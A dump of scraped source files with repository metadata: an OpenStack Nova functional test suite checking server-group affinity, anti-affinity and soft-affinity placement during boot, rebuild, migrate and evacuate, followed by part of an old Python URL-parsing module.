"language": [
{
"name": "Dockerfile",
"bytes": "2782"
},
{
"name": "Python",
"bytes": "40129467"
},
{
"name": "Shell",
"bytes": "4910"
}
],
"symlink_target": ""
} |
import time
import mock
from oslo_config import cfg
from nova import context
from nova import db
from nova.db.sqlalchemy import api as db_api
from nova import test
from nova.tests import fixtures as nova_fixtures
from nova.tests.functional.api import client
from nova.tests.functional import integrated_helpers
from nova.tests.unit import fake_network
from nova.tests.unit import policy_fixture
import nova.scheduler.utils
import nova.servicegroup
import nova.tests.unit.image.fake
CONF = cfg.CONF
# An alternate project id
PROJECT_ID_ALT = "616c6c796f7572626173656172656f73"
class ServerGroupTestBase(test.TestCase,
integrated_helpers.InstanceHelperMixin):
REQUIRES_LOCKING = True
api_major_version = 'v2.1'
microversion = None
# Note(gibi): RamFilter is needed to ensure that
# test_boot_servers_with_affinity_no_valid_host behaves as expected
_scheduler_default_filters = ['ServerGroupAntiAffinityFilter',
'ServerGroupAffinityFilter',
'RamFilter']
# Override servicegroup parameters to make the tests run faster
_service_down_time = 2
_report_interval = 1
anti_affinity = {'name': 'fake-name-1', 'policies': ['anti-affinity']}
affinity = {'name': 'fake-name-2', 'policies': ['affinity']}
def _get_weight_classes(self):
return []
def setUp(self):
super(ServerGroupTestBase, self).setUp()
self.flags(scheduler_default_filters=self._scheduler_default_filters)
self.flags(scheduler_weight_classes=self._get_weight_classes())
self.flags(service_down_time=self._service_down_time)
self.flags(report_interval=self._report_interval)
self.useFixture(policy_fixture.RealPolicyFixture())
api_fixture = self.useFixture(nova_fixtures.OSAPIFixture(
api_version='v2.1'))
self.api = api_fixture.api
self.api.microversion = self.microversion
self.admin_api = api_fixture.admin_api
self.admin_api.microversion = self.microversion
# the image fake backend needed for image discovery
nova.tests.unit.image.fake.stub_out_image_service(self)
self.start_service('conductor', manager=CONF.conductor.manager)
self.start_service('scheduler')
self.addCleanup(nova.tests.unit.image.fake.FakeImageService_reset)
def _boot_a_server_to_group(self, group,
expected_status='ACTIVE', flavor=None):
server = self._build_minimal_create_server_request(self.api,
'some-server')
if flavor:
server['flavorRef'] = ('http://fake.server/%s'
% flavor['id'])
post = {'server': server,
'os:scheduler_hints': {'group': group['id']}}
created_server = self.api.post_server(post)
self.assertTrue(created_server['id'])
# Wait for it to finish being created
found_server = self._wait_for_state_change(
self.admin_api, created_server, expected_status)
return found_server
class ServerGroupTestV21(ServerGroupTestBase):
def setUp(self):
super(ServerGroupTestV21, self).setUp()
self.start_service('network')
self.compute = self.start_service('compute')
# NOTE(gibi): start a second compute host to be able to test affinity
self.compute2 = self.start_service('compute', host='host2')
fake_network.set_stub_network_methods(self)
def test_get_no_groups(self):
groups = self.api.get_server_groups()
self.assertEqual([], groups)
def test_create_and_delete_groups(self):
groups = [self.anti_affinity,
self.affinity]
created_groups = []
for group in groups:
created_group = self.api.post_server_groups(group)
created_groups.append(created_group)
self.assertEqual(group['name'], created_group['name'])
self.assertEqual(group['policies'], created_group['policies'])
self.assertEqual([], created_group['members'])
self.assertEqual({}, created_group['metadata'])
self.assertIn('id', created_group)
group_details = self.api.get_server_group(created_group['id'])
self.assertEqual(created_group, group_details)
existing_groups = self.api.get_server_groups()
self.assertIn(created_group, existing_groups)
existing_groups = self.api.get_server_groups()
self.assertEqual(len(groups), len(existing_groups))
for group in created_groups:
self.api.delete_server_group(group['id'])
existing_groups = self.api.get_server_groups()
self.assertNotIn(group, existing_groups)
def test_create_wrong_policy(self):
ex = self.assertRaises(client.OpenStackApiException,
self.api.post_server_groups,
{'name': 'fake-name-1',
'policies': ['wrong-policy']})
self.assertEqual(400, ex.response.status_code)
self.assertIn('Invalid input', ex.response.text)
self.assertIn('wrong-policy', ex.response.text)
def test_get_groups_all_projects(self):
# This test requires APIs using two projects.
# Create an API using project 'openstack1'.
# This is a non-admin API.
#
# NOTE(sdague): this is actually very much *not* how this
# fixture should be used. This actually spawns a whole
# additional API server. Should be addressed in the future.
api_openstack1 = self.useFixture(nova_fixtures.OSAPIFixture(
api_version=self.api_major_version,
project_id=PROJECT_ID_ALT)).api
api_openstack1.microversion = self.microversion
# Create a server group in project 'openstack'
# Project 'openstack' is used by self.api
group1 = self.anti_affinity
openstack_group = self.api.post_server_groups(group1)
# Create a server group in project 'openstack1'
group2 = self.affinity
openstack1_group = api_openstack1.post_server_groups(group2)
# The admin should be able to get server groups in all projects.
all_projects_admin = self.admin_api.get_server_groups(
all_projects=True)
self.assertIn(openstack_group, all_projects_admin)
self.assertIn(openstack1_group, all_projects_admin)
# The non-admin should only be able to get server groups
# in his project.
# The all_projects parameter is ignored for non-admin clients.
all_projects_non_admin = api_openstack1.get_server_groups(
all_projects=True)
self.assertNotIn(openstack_group, all_projects_non_admin)
self.assertIn(openstack1_group, all_projects_non_admin)
def test_create_duplicated_policy(self):
ex = self.assertRaises(client.OpenStackApiException,
self.api.post_server_groups,
{"name": "fake-name-1",
"policies": ["affinity", "affinity"]})
self.assertEqual(400, ex.response.status_code)
self.assertIn('Invalid input', ex.response.text)
def test_create_multiple_policies(self):
ex = self.assertRaises(client.OpenStackApiException,
self.api.post_server_groups,
{"name": "fake-name-1",
"policies": ["anti-affinity", "affinity"]})
self.assertEqual(400, ex.response.status_code)
def _boot_servers_to_group(self, group, flavor=None):
servers = []
for _ in range(0, 2):
server = self._boot_a_server_to_group(group,
flavor=flavor)
servers.append(server)
return servers
def test_boot_servers_with_affinity(self):
created_group = self.api.post_server_groups(self.affinity)
servers = self._boot_servers_to_group(created_group)
members = self.api.get_server_group(created_group['id'])['members']
host = servers[0]['OS-EXT-SRV-ATTR:host']
for server in servers:
self.assertIn(server['id'], members)
self.assertEqual(host, server['OS-EXT-SRV-ATTR:host'])
def test_boot_servers_with_affinity_overquota(self):
# Tests that we check server group member quotas and cleanup created
# resources when we fail with OverQuota.
self.flags(quota_server_group_members=1)
# make sure we start with 0 servers
servers = self.api.get_servers(detail=False)
self.assertEqual(0, len(servers))
created_group = self.api.post_server_groups(self.affinity)
ex = self.assertRaises(client.OpenStackApiException,
self._boot_servers_to_group,
created_group)
self.assertEqual(403, ex.response.status_code)
# _boot_servers_to_group creates 2 instances in the group in order, not
# multiple servers in a single request. Since our quota is 1, the first
# server create would pass, the second should fail, and we should be
# left with 1 server and it's 1 block device mapping.
servers = self.api.get_servers(detail=False)
self.assertEqual(1, len(servers))
ctxt = context.get_admin_context()
servers = db.instance_get_all(ctxt)
self.assertEqual(1, len(servers))
ctxt_mgr = db_api.get_context_manager(ctxt)
with ctxt_mgr.reader.using(ctxt):
bdms = db_api._block_device_mapping_get_query(ctxt).all()
self.assertEqual(1, len(bdms))
self.assertEqual(servers[0]['uuid'], bdms[0]['instance_uuid'])
def test_boot_servers_with_affinity_no_valid_host(self):
created_group = self.api.post_server_groups(self.affinity)
# Using big enough flavor to use up the resources on the host
flavor = self.api.get_flavors()[2]
self._boot_servers_to_group(created_group, flavor=flavor)
# The third server cannot be booted as there is not enough resource
# on the host where the first two server was booted
failed_server = self._boot_a_server_to_group(created_group,
flavor=flavor,
expected_status='ERROR')
self.assertEqual('No valid host was found. '
'There are not enough hosts available.',
failed_server['fault']['message'])
def test_boot_servers_with_anti_affinity(self):
created_group = self.api.post_server_groups(self.anti_affinity)
servers = self._boot_servers_to_group(created_group)
members = self.api.get_server_group(created_group['id'])['members']
self.assertNotEqual(servers[0]['OS-EXT-SRV-ATTR:host'],
servers[1]['OS-EXT-SRV-ATTR:host'])
for server in servers:
self.assertIn(server['id'], members)
def test_boot_server_with_anti_affinity_no_valid_host(self):
created_group = self.api.post_server_groups(self.anti_affinity)
self._boot_servers_to_group(created_group)
# We have 2 computes so the third server won't fit into the same group
failed_server = self._boot_a_server_to_group(created_group,
expected_status='ERROR')
self.assertEqual('No valid host was found. '
'There are not enough hosts available.',
failed_server['fault']['message'])
def _rebuild_with_group(self, group):
created_group = self.api.post_server_groups(group)
servers = self._boot_servers_to_group(created_group)
post = {'rebuild': {'imageRef':
'76fa36fc-c930-4bf3-8c8a-ea2a2420deb6'}}
self.api.post_server_action(servers[1]['id'], post)
rebuilt_server = self._wait_for_state_change(
self.admin_api, servers[1], 'ACTIVE')
self.assertEqual(post['rebuild']['imageRef'],
rebuilt_server.get('image')['id'])
return [servers[0], rebuilt_server]
def test_rebuild_with_affinity(self):
untouched_server, rebuilt_server = self._rebuild_with_group(
self.affinity)
self.assertEqual(untouched_server['OS-EXT-SRV-ATTR:host'],
rebuilt_server['OS-EXT-SRV-ATTR:host'])
def test_rebuild_with_anti_affinity(self):
untouched_server, rebuilt_server = self._rebuild_with_group(
self.anti_affinity)
self.assertNotEqual(untouched_server['OS-EXT-SRV-ATTR:host'],
rebuilt_server['OS-EXT-SRV-ATTR:host'])
def _migrate_with_group_no_valid_host(self, group):
created_group = self.api.post_server_groups(group)
servers = self._boot_servers_to_group(created_group)
post = {'migrate': {}}
ex = self.assertRaises(client.OpenStackApiException,
self.admin_api.post_server_action,
servers[1]['id'], post)
self.assertEqual(400, ex.response.status_code)
self.assertIn('No valid host found for cold migrate', ex.response.text)
def test_migrate_with_group_no_valid_host(self):
for group in [self.affinity, self.anti_affinity]:
self._migrate_with_group_no_valid_host(group)
def test_migrate_with_anti_affinity(self):
# Start additional host to test migration with anti-affinity
self.start_service('compute', host='host3')
created_group = self.api.post_server_groups(self.anti_affinity)
servers = self._boot_servers_to_group(created_group)
post = {'migrate': {}}
self.admin_api.post_server_action(servers[1]['id'], post)
migrated_server = self._wait_for_state_change(
self.admin_api, servers[1], 'VERIFY_RESIZE')
self.assertNotEqual(servers[0]['OS-EXT-SRV-ATTR:host'],
migrated_server['OS-EXT-SRV-ATTR:host'])
def test_resize_to_same_host_with_anti_affinity(self):
self.flags(allow_resize_to_same_host=True)
created_group = self.api.post_server_groups(self.anti_affinity)
servers = self._boot_servers_to_group(created_group,
flavor=self.api.get_flavors()[0])
post = {'resize': {'flavorRef': '2'}}
server1_old_host = servers[1]['OS-EXT-SRV-ATTR:host']
self.admin_api.post_server_action(servers[1]['id'], post)
migrated_server = self._wait_for_state_change(
self.admin_api, servers[1], 'VERIFY_RESIZE')
self.assertEqual(server1_old_host,
migrated_server['OS-EXT-SRV-ATTR:host'])
def _get_compute_service_by_host_name(self, host_name):
host = None
if self.compute.host == host_name:
host = self.compute
elif self.compute2.host == host_name:
host = self.compute2
else:
raise AssertionError('host = %s does not found in '
'existing hosts %s' %
(host_name, str([self.compute.host,
self.compute2.host])))
return host
def test_evacuate_with_anti_affinity(self):
created_group = self.api.post_server_groups(self.anti_affinity)
servers = self._boot_servers_to_group(created_group)
host = self._get_compute_service_by_host_name(
servers[1]['OS-EXT-SRV-ATTR:host'])
host.stop()
# Need to wait service_down_time amount of seconds to ensure
# nova considers the host down
time.sleep(self._service_down_time)
# Start additional host to test evacuation
self.start_service('compute', host='host3')
post = {'evacuate': {'onSharedStorage': False}}
self.admin_api.post_server_action(servers[1]['id'], post)
evacuated_server = self._wait_for_state_change(
self.admin_api, servers[1], 'ACTIVE')
self.assertNotEqual(evacuated_server['OS-EXT-SRV-ATTR:host'],
servers[0]['OS-EXT-SRV-ATTR:host'])
host.start()
def test_evacuate_with_anti_affinity_no_valid_host(self):
created_group = self.api.post_server_groups(self.anti_affinity)
servers = self._boot_servers_to_group(created_group)
host = self._get_compute_service_by_host_name(
servers[1]['OS-EXT-SRV-ATTR:host'])
host.stop()
# Need to wait service_down_time amount of seconds to ensure
# nova considers the host down
time.sleep(self._service_down_time)
post = {'evacuate': {'onSharedStorage': False}}
self.admin_api.post_server_action(servers[1]['id'], post)
server_after_failed_evac = self._wait_for_state_change(
self.admin_api, servers[1], 'ACTIVE')
# assert that after a failed evac the server active on the same host
# as before
self.assertEqual(server_after_failed_evac['OS-EXT-SRV-ATTR:host'],
servers[1]['OS-EXT-SRV-ATTR:host'])
host.start()
def test_evacuate_with_affinity_no_valid_host(self):
created_group = self.api.post_server_groups(self.affinity)
servers = self._boot_servers_to_group(created_group)
host = self._get_compute_service_by_host_name(
servers[1]['OS-EXT-SRV-ATTR:host'])
host.stop()
# Need to wait service_down_time amount of seconds to ensure
# nova considers the host down
time.sleep(self._service_down_time)
post = {'evacuate': {'onSharedStorage': False}}
self.admin_api.post_server_action(servers[1]['id'], post)
server_after_failed_evac = self._wait_for_state_change(
self.admin_api, servers[1], 'ACTIVE')
# assert that after a failed evac the server active on the same host
# as before
self.assertEqual(server_after_failed_evac['OS-EXT-SRV-ATTR:host'],
servers[1]['OS-EXT-SRV-ATTR:host'])
host.start()
def test_soft_affinity_not_supported(self):
ex = self.assertRaises(client.OpenStackApiException,
self.api.post_server_groups,
{'name': 'fake-name-1',
'policies': ['soft-affinity']})
self.assertEqual(400, ex.response.status_code)
self.assertIn('Invalid input', ex.response.text)
self.assertIn('soft-affinity', ex.response.text)
class ServerGroupAffinityConfTest(ServerGroupTestBase):
api_major_version = 'v2.1'
# Load only anti-affinity filter so affinity will be missing
_scheduler_default_filters = 'ServerGroupAntiAffinityFilter'
@mock.patch('nova.scheduler.utils._SUPPORTS_AFFINITY', None)
def test_affinity_no_filter(self):
created_group = self.api.post_server_groups(self.affinity)
failed_server = self._boot_a_server_to_group(created_group,
expected_status='ERROR')
self.assertEqual('ServerGroup policy is not supported: '
'ServerGroupAffinityFilter not configured',
failed_server['fault']['message'])
self.assertEqual(400, failed_server['fault']['code'])
class ServerGroupAntiAffinityConfTest(ServerGroupTestBase):
api_major_version = 'v2.1'
# Load only affinity filter so anti-affinity will be missing
_scheduler_default_filters = 'ServerGroupAffinityFilter'
@mock.patch('nova.scheduler.utils._SUPPORTS_ANTI_AFFINITY', None)
def test_anti_affinity_no_filter(self):
created_group = self.api.post_server_groups(self.anti_affinity)
failed_server = self._boot_a_server_to_group(created_group,
expected_status='ERROR')
self.assertEqual('ServerGroup policy is not supported: '
'ServerGroupAntiAffinityFilter not configured',
failed_server['fault']['message'])
self.assertEqual(400, failed_server['fault']['code'])
class ServerGroupSoftAffinityConfTest(ServerGroupTestBase):
api_major_version = 'v2.1'
microversion = '2.15'
soft_affinity = {'name': 'fake-name-4',
'policies': ['soft-affinity']}
def _get_weight_classes(self):
# Load only soft-anti-affinity weigher so affinity will be missing
return ['nova.scheduler.weights.affinity.'
'ServerGroupSoftAntiAffinityWeigher']
@mock.patch('nova.scheduler.utils._SUPPORTS_SOFT_AFFINITY', None)
def test_soft_affinity_no_filter(self):
created_group = self.api.post_server_groups(self.soft_affinity)
failed_server = self._boot_a_server_to_group(created_group,
expected_status='ERROR')
self.assertEqual('ServerGroup policy is not supported: '
'ServerGroupSoftAffinityWeigher not configured',
failed_server['fault']['message'])
self.assertEqual(400, failed_server['fault']['code'])
class ServerGroupSoftAntiAffinityConfTest(ServerGroupTestBase):
api_major_version = 'v2.1'
microversion = '2.15'
soft_anti_affinity = {'name': 'fake-name-3',
'policies': ['soft-anti-affinity']}
# Load only soft affinity filter so anti-affinity will be missing
_scheduler_weight_classes = ['nova.scheduler.weights.affinity.'
'ServerGroupSoftAffinityWeigher']
def _get_weight_classes(self):
# Load only soft affinity filter so anti-affinity will be missing
return ['nova.scheduler.weights.affinity.'
'ServerGroupSoftAffinityWeigher']
@mock.patch('nova.scheduler.utils._SUPPORTS_SOFT_ANTI_AFFINITY', None)
def test_soft_anti_affinity_no_filter(self):
created_group = self.api.post_server_groups(self.soft_anti_affinity)
failed_server = self._boot_a_server_to_group(created_group,
expected_status='ERROR')
self.assertEqual('ServerGroup policy is not supported: '
'ServerGroupSoftAntiAffinityWeigher not configured',
failed_server['fault']['message'])
self.assertEqual(400, failed_server['fault']['code'])
class ServerGroupTestV215(ServerGroupTestV21):
api_major_version = 'v2.1'
microversion = '2.15'
soft_anti_affinity = {'name': 'fake-name-3',
'policies': ['soft-anti-affinity']}
soft_affinity = {'name': 'fake-name-4',
'policies': ['soft-affinity']}
def setUp(self):
super(ServerGroupTestV215, self).setUp()
soft_affinity_patcher = mock.patch(
'nova.scheduler.utils._SUPPORTS_SOFT_AFFINITY')
soft_anti_affinity_patcher = mock.patch(
'nova.scheduler.utils._SUPPORTS_SOFT_ANTI_AFFINITY')
self.addCleanup(soft_affinity_patcher.stop)
self.addCleanup(soft_anti_affinity_patcher.stop)
self.mock_soft_affinity = soft_affinity_patcher.start()
self.mock_soft_anti_affinity = soft_anti_affinity_patcher.start()
self.mock_soft_affinity.return_value = None
self.mock_soft_anti_affinity.return_value = None
def _get_weight_classes(self):
return ['nova.scheduler.weights.affinity.'
'ServerGroupSoftAffinityWeigher',
'nova.scheduler.weights.affinity.'
'ServerGroupSoftAntiAffinityWeigher']
def test_evacuate_with_anti_affinity(self):
created_group = self.api.post_server_groups(self.anti_affinity)
servers = self._boot_servers_to_group(created_group)
host = self._get_compute_service_by_host_name(
servers[1]['OS-EXT-SRV-ATTR:host'])
host.stop()
# Need to wait service_down_time amount of seconds to ensure
# nova considers the host down
time.sleep(self._service_down_time)
# Start additional host to test evacuation
compute3 = self.start_service('compute', host='host3')
post = {'evacuate': {}}
self.admin_api.post_server_action(servers[1]['id'], post)
evacuated_server = self._wait_for_state_change(
self.admin_api, servers[1], 'ACTIVE')
self.assertNotEqual(evacuated_server['OS-EXT-SRV-ATTR:host'],
servers[0]['OS-EXT-SRV-ATTR:host'])
compute3.kill()
host.start()
def test_evacuate_with_anti_affinity_no_valid_host(self):
created_group = self.api.post_server_groups(self.anti_affinity)
servers = self._boot_servers_to_group(created_group)
host = self._get_compute_service_by_host_name(
servers[1]['OS-EXT-SRV-ATTR:host'])
host.stop()
# Need to wait service_down_time amount of seconds to ensure
# nova considers the host down
time.sleep(self._service_down_time)
post = {'evacuate': {}}
self.admin_api.post_server_action(servers[1]['id'], post)
server_after_failed_evac = self._wait_for_state_change(
self.admin_api, servers[1], 'ACTIVE')
# assert that after a failed evac the server active on the same host
# as before
self.assertEqual(server_after_failed_evac['OS-EXT-SRV-ATTR:host'],
servers[1]['OS-EXT-SRV-ATTR:host'])
host.start()
def test_evacuate_with_affinity_no_valid_host(self):
created_group = self.api.post_server_groups(self.affinity)
servers = self._boot_servers_to_group(created_group)
host = self._get_compute_service_by_host_name(
servers[1]['OS-EXT-SRV-ATTR:host'])
host.stop()
# Need to wait service_down_time amount of seconds to ensure
# nova considers the host down
time.sleep(self._service_down_time)
post = {'evacuate': {}}
self.admin_api.post_server_action(servers[1]['id'], post)
server_after_failed_evac = self._wait_for_state_change(
self.admin_api, servers[1], 'ACTIVE')
# assert that after a failed evac the server active on the same host
# as before
self.assertEqual(server_after_failed_evac['OS-EXT-SRV-ATTR:host'],
servers[1]['OS-EXT-SRV-ATTR:host'])
host.start()
def test_create_and_delete_groups(self):
groups = [self.anti_affinity,
self.affinity,
self.soft_affinity,
self.soft_anti_affinity]
created_groups = []
for group in groups:
created_group = self.api.post_server_groups(group)
created_groups.append(created_group)
self.assertEqual(group['name'], created_group['name'])
self.assertEqual(group['policies'], created_group['policies'])
self.assertEqual([], created_group['members'])
self.assertEqual({}, created_group['metadata'])
self.assertIn('id', created_group)
group_details = self.api.get_server_group(created_group['id'])
self.assertEqual(created_group, group_details)
existing_groups = self.api.get_server_groups()
self.assertIn(created_group, existing_groups)
existing_groups = self.api.get_server_groups()
self.assertEqual(len(groups), len(existing_groups))
for group in created_groups:
self.api.delete_server_group(group['id'])
existing_groups = self.api.get_server_groups()
self.assertNotIn(group, existing_groups)
def test_boot_servers_with_soft_affinity(self):
created_group = self.api.post_server_groups(self.soft_affinity)
servers = self._boot_servers_to_group(created_group)
members = self.api.get_server_group(created_group['id'])['members']
self.assertEqual(2, len(servers))
self.assertIn(servers[0]['id'], members)
self.assertIn(servers[1]['id'], members)
self.assertEqual(servers[0]['OS-EXT-SRV-ATTR:host'],
servers[1]['OS-EXT-SRV-ATTR:host'])
def test_boot_servers_with_soft_affinity_no_resource_on_first_host(self):
created_group = self.api.post_server_groups(self.soft_affinity)
# Using big enough flavor to use up the resources on the first host
flavor = self.api.get_flavors()[2]
servers = self._boot_servers_to_group(created_group, flavor)
# The third server cannot be booted on the first host as there
# is not enough resource there, but as opposed to the affinity policy
# it will be booted on the other host, which has enough resources.
third_server = self._boot_a_server_to_group(created_group,
flavor=flavor)
members = self.api.get_server_group(created_group['id'])['members']
hosts = []
for server in servers:
hosts.append(server['OS-EXT-SRV-ATTR:host'])
self.assertIn(third_server['id'], members)
self.assertNotIn(third_server['OS-EXT-SRV-ATTR:host'], hosts)
def test_boot_servers_with_soft_anti_affinity(self):
created_group = self.api.post_server_groups(self.soft_anti_affinity)
servers = self._boot_servers_to_group(created_group)
members = self.api.get_server_group(created_group['id'])['members']
self.assertEqual(2, len(servers))
self.assertIn(servers[0]['id'], members)
self.assertIn(servers[1]['id'], members)
self.assertNotEqual(servers[0]['OS-EXT-SRV-ATTR:host'],
servers[1]['OS-EXT-SRV-ATTR:host'])
def test_boot_servers_with_soft_anti_affinity_one_available_host(self):
self.compute2.kill()
created_group = self.api.post_server_groups(self.soft_anti_affinity)
servers = self._boot_servers_to_group(created_group)
members = self.api.get_server_group(created_group['id'])['members']
host = servers[0]['OS-EXT-SRV-ATTR:host']
for server in servers:
self.assertIn(server['id'], members)
self.assertEqual(host, server['OS-EXT-SRV-ATTR:host'])
def test_rebuild_with_soft_affinity(self):
untouched_server, rebuilt_server = self._rebuild_with_group(
self.soft_affinity)
self.assertEqual(untouched_server['OS-EXT-SRV-ATTR:host'],
rebuilt_server['OS-EXT-SRV-ATTR:host'])
def test_rebuild_with_soft_anti_affinity(self):
untouched_server, rebuilt_server = self._rebuild_with_group(
self.soft_anti_affinity)
self.assertNotEqual(untouched_server['OS-EXT-SRV-ATTR:host'],
rebuilt_server['OS-EXT-SRV-ATTR:host'])
def _migrate_with_soft_affinity_policies(self, group):
created_group = self.api.post_server_groups(group)
servers = self._boot_servers_to_group(created_group)
post = {'migrate': {}}
self.admin_api.post_server_action(servers[1]['id'], post)
migrated_server = self._wait_for_state_change(
self.admin_api, servers[1], 'VERIFY_RESIZE')
return [migrated_server['OS-EXT-SRV-ATTR:host'],
servers[0]['OS-EXT-SRV-ATTR:host']]
def test_migrate_with_soft_affinity(self):
migrated_server, other_server = (
self._migrate_with_soft_affinity_policies(self.soft_affinity))
self.assertNotEqual(migrated_server, other_server)
def test_migrate_with_soft_anti_affinity(self):
migrated_server, other_server = (
self._migrate_with_soft_affinity_policies(self.soft_anti_affinity))
self.assertEqual(migrated_server, other_server)
def _evacuate_with_soft_anti_affinity_policies(self, group):
created_group = self.api.post_server_groups(group)
servers = self._boot_servers_to_group(created_group)
host = self._get_compute_service_by_host_name(
servers[1]['OS-EXT-SRV-ATTR:host'])
host.stop()
# Need to wait service_down_time amount of seconds to ensure
# nova considers the host down
time.sleep(self._service_down_time)
post = {'evacuate': {}}
self.admin_api.post_server_action(servers[1]['id'], post)
evacuated_server = self._wait_for_state_change(
self.admin_api, servers[1], 'ACTIVE')
# Note(gibi): need to get the server again as the state of the instance
# goes to ACTIVE first then the host of the instance changes to the
# new host later
evacuated_server = self.admin_api.get_server(evacuated_server['id'])
host.start()
return [evacuated_server['OS-EXT-SRV-ATTR:host'],
servers[0]['OS-EXT-SRV-ATTR:host']]
def test_evacuate_with_soft_affinity(self):
evacuated_server, other_server = (
self._evacuate_with_soft_anti_affinity_policies(
self.soft_affinity))
self.assertNotEqual(evacuated_server, other_server)
def test_evacuate_with_soft_anti_affinity(self):
evacuated_server, other_server = (
self._evacuate_with_soft_anti_affinity_policies(
self.soft_anti_affinity))
self.assertEqual(evacuated_server, other_server)
def test_soft_affinity_not_supported(self):
pass
| {
"content_hash": "b172302bbf9f13166a0ac5ed94db896f",
"timestamp": "",
"source": "github",
"line_count": 788,
"max_line_length": 79,
"avg_line_length": 42.954314720812185,
"alnum_prop": 0.6127983928149374,
"repo_name": "cloudbase/nova",
"id": "281fbb4ae1ae943e93fc2e92faf5448f0c5a7b45",
"size": "34475",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "nova/tests/functional/test_server_group.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "PHP",
"bytes": "3325"
},
{
"name": "Python",
"bytes": "18199370"
},
{
"name": "Shell",
"bytes": "37074"
},
{
"name": "Smarty",
"bytes": "299657"
}
],
"symlink_target": ""
} |
"""Parse (absolute and relative) URLs.
See RFC 1808: "Relative Uniform Resource Locators", by R. Fielding,
UC Irvine, June 1995.
"""
__all__ = ["urlparse", "urlunparse", "urljoin", "urldefrag",
"urlsplit", "urlunsplit", "parse_qs", "parse_qsl"]
# A classification of schemes ('' means apply by default)
uses_relative = ['ftp', 'http', 'gopher', 'nntp', 'imap',
'wais', 'file', 'https', 'shttp', 'mms',
'prospero', 'rtsp', 'rtspu', '', 'sftp']
uses_netloc = ['ftp', 'http', 'gopher', 'nntp', 'telnet',
'imap', 'wais', 'file', 'mms', 'https', 'shttp',
'snews', 'prospero', 'rtsp', 'rtspu', 'rsync', '',
'svn', 'svn+ssh', 'sftp']
non_hierarchical = ['gopher', 'hdl', 'mailto', 'news',
'telnet', 'wais', 'imap', 'snews', 'sip', 'sips']
uses_params = ['ftp', 'hdl', 'prospero', 'http', 'imap',
'https', 'shttp', 'rtsp', 'rtspu', 'sip', 'sips',
'mms', '', 'sftp']
uses_query = ['http', 'wais', 'imap', 'https', 'shttp', 'mms',
'gopher', 'rtsp', 'rtspu', 'sip', 'sips', '']
uses_fragment = ['ftp', 'hdl', 'http', 'gopher', 'news',
'nntp', 'wais', 'https', 'shttp', 'snews',
'file', 'prospero', '']
# Characters valid in scheme names
scheme_chars = ('abcdefghijklmnopqrstuvwxyz'
'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
'0123456789'
'+-.')
MAX_CACHE_SIZE = 20
_parse_cache = {}
def clear_cache():
"""Clear the parse cache."""
_parse_cache.clear()
class ResultMixin(object):
"""Shared methods for the parsed result objects."""
@property
def username(self):
netloc = self.netloc
if "@" in netloc:
userinfo = netloc.rsplit("@", 1)[0]
if ":" in userinfo:
userinfo = userinfo.split(":", 1)[0]
return userinfo
return None
@property
def password(self):
netloc = self.netloc
if "@" in netloc:
userinfo = netloc.rsplit("@", 1)[0]
if ":" in userinfo:
return userinfo.split(":", 1)[1]
return None
@property
def hostname(self):
netloc = self.netloc
if "@" in netloc:
netloc = netloc.rsplit("@", 1)[1]
if ":" in netloc:
netloc = netloc.split(":", 1)[0]
return netloc.lower() or None
@property
def port(self):
netloc = self.netloc
if "@" in netloc:
netloc = netloc.rsplit("@", 1)[1]
if ":" in netloc:
port = netloc.split(":", 1)[1]
return int(port, 10)
return None
from collections import namedtuple
class SplitResult(namedtuple('SplitResult', 'scheme netloc path query fragment'), ResultMixin):
__slots__ = ()
def geturl(self):
return urlunsplit(self)
class ParseResult(namedtuple('ParseResult', 'scheme netloc path params query fragment'), ResultMixin):
__slots__ = ()
def geturl(self):
return urlunparse(self)
def urlparse(url, scheme='', allow_fragments=True):
"""Parse a URL into 6 components:
<scheme>://<netloc>/<path>;<params>?<query>#<fragment>
Return a 6-tuple: (scheme, netloc, path, params, query, fragment).
Note that we don't break the components up in smaller bits
(e.g. netloc is a single string) and we don't expand % escapes."""
tuple = urlsplit(url, scheme, allow_fragments)
scheme, netloc, url, query, fragment = tuple
if scheme in uses_params and ';' in url:
url, params = _splitparams(url)
else:
params = ''
return ParseResult(scheme, netloc, url, params, query, fragment)
def _splitparams(url):
if '/' in url:
i = url.find(';', url.rfind('/'))
if i < 0:
return url, ''
else:
i = url.find(';')
return url[:i], url[i+1:]
def _splitnetloc(url, start=0):
delim = len(url) # position of end of domain part of url, default is end
for c in '/?#': # look for delimiters; the order is NOT important
wdelim = url.find(c, start) # find first of this delim
if wdelim >= 0: # if found
delim = min(delim, wdelim) # use earliest delim position
return url[start:delim], url[delim:] # return (domain, rest)
def urlsplit(url, scheme='', allow_fragments=True):
"""Parse a URL into 5 components:
<scheme>://<netloc>/<path>?<query>#<fragment>
Return a 5-tuple: (scheme, netloc, path, query, fragment).
Note that we don't break the components up in smaller bits
(e.g. netloc is a single string) and we don't expand % escapes."""
allow_fragments = bool(allow_fragments)
key = url, scheme, allow_fragments, type(url), type(scheme)
cached = _parse_cache.get(key, None)
if cached:
return cached
if len(_parse_cache) >= MAX_CACHE_SIZE: # avoid runaway growth
clear_cache()
netloc = query = fragment = ''
i = url.find(':')
if i > 0:
if url[:i] == 'http': # optimize the common case
scheme = url[:i].lower()
url = url[i+1:]
if url[:2] == '//':
netloc, url = _splitnetloc(url, 2)
if allow_fragments and '#' in url:
url, fragment = url.split('#', 1)
if '?' in url:
url, query = url.split('?', 1)
v = SplitResult(scheme, netloc, url, query, fragment)
_parse_cache[key] = v
return v
for c in url[:i]:
if c not in scheme_chars:
break
else:
scheme, url = url[:i].lower(), url[i+1:]
if scheme in uses_netloc and url[:2] == '//':
netloc, url = _splitnetloc(url, 2)
if allow_fragments and scheme in uses_fragment and '#' in url:
url, fragment = url.split('#', 1)
if scheme in uses_query and '?' in url:
url, query = url.split('?', 1)
v = SplitResult(scheme, netloc, url, query, fragment)
_parse_cache[key] = v
return v
def urlunparse(data):
"""Put a parsed URL back together again. This may result in a
slightly different, but equivalent URL, if the URL that was parsed
originally had redundant delimiters, e.g. a ? with an empty query
(the draft states that these are equivalent)."""
scheme, netloc, url, params, query, fragment = data
if params:
url = "%s;%s" % (url, params)
return urlunsplit((scheme, netloc, url, query, fragment))
def urlunsplit(data):
scheme, netloc, url, query, fragment = data
if netloc or (scheme and scheme in uses_netloc and url[:2] != '//'):
if url and url[:1] != '/': url = '/' + url
url = '//' + (netloc or '') + url
if scheme:
url = scheme + ':' + url
if query:
url = url + '?' + query
if fragment:
url = url + '#' + fragment
return url
